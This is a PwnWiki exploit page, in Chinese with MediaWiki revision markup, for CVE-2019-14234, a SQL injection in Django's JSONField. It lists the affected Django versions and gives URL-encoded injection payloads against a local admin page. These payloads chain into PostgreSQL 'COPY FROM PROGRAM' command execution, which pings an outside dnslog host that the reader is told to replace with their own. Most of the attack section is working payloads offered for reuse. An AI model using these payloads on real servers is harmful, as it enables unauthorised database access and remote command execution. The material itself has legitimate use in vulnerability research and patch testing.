Difference between revisions of "CVE-2019-14234 Django JSONField SQL注入漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Django 2.2.x < 2.2.4 Django 2.1.x < 2.1.11 Django 1.11.x < 1.11.23 </pre> <translate> ==漏洞利用== </tr...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 13: | Line 13: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
首先需登錄管理員後臺,訪問模型Collection的管理頁面: | 首先需登錄管理員後臺,訪問模型Collection的管理頁面: | ||
</translate> | </translate> | ||
| Line 32: | Line 33: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
Django一般與PostgreSQL一起配合使用,可以嘗試利用PostgreSQL 高權限命令執行漏洞[https://www.pwnwiki.org/index.php?title=CVE-2019-9193_PostgreSQL_%E9%AB%98%E6%AC%8A%E9%99%90%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E (CVE-2019-9193)] | Django一般與PostgreSQL一起配合使用,可以嘗試利用PostgreSQL 高權限命令執行漏洞[https://www.pwnwiki.org/index.php?title=CVE-2019-9193_PostgreSQL_%E9%AB%98%E6%AC%8A%E9%99%90%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E (CVE-2019-9193)] | ||
</translate> | </translate> | ||
| Line 37: | Line 39: | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
訪問以下URL: | 訪問以下URL: | ||
</translate> | </translate> | ||
| Line 44: | Line 47: | ||
<translate> | <translate> | ||
| + | <!--T:6--> | ||
回顯<code>no results to fetch</code> 語句成功執行。 | 回顯<code>no results to fetch</code> 語句成功執行。 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:7--> | ||
訪問: | 訪問: | ||
</translate> | </translate> | ||
| Line 55: | Line 60: | ||
<translate> | <translate> | ||
| + | <!--T:8--> | ||
命令成功執行。 | 命令成功執行。 | ||
</translate> | </translate> | ||
| Line 60: | Line 66: | ||
===⚠️️=== | ===⚠️️=== | ||
<translate> | <translate> | ||
| + | <!--T:9--> | ||
<code>test.dnslog.cn</code>請修改爲自己的Dnslog | <code>test.dnslog.cn</code>請修改爲自己的Dnslog | ||
</translate> | </translate> | ||
Latest revision as of 19:48, 7 April 2021
影響版本
Django 2.2.x < 2.2.4 Django 2.1.x < 2.1.11 Django 1.11.x < 1.11.23
漏洞利用
首先需登錄管理員後臺,訪問模型Collection的管理頁面:
http://127.0.0.1/admin/vuln/collection/
http://127.0.0.1/admin/vuln/collection/?detail__a%27
http://127.0.0.1/admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20--
Django一般與PostgreSQL一起配合使用,可以嘗試利用PostgreSQL 高權限命令執行漏洞(CVE-2019-9193)
訪問以下URL:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20
回顯no results to fetch 語句成功執行。
訪問:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20
命令成功執行。
⚠️️
test.dnslog.cn請修改爲自己的Dnslog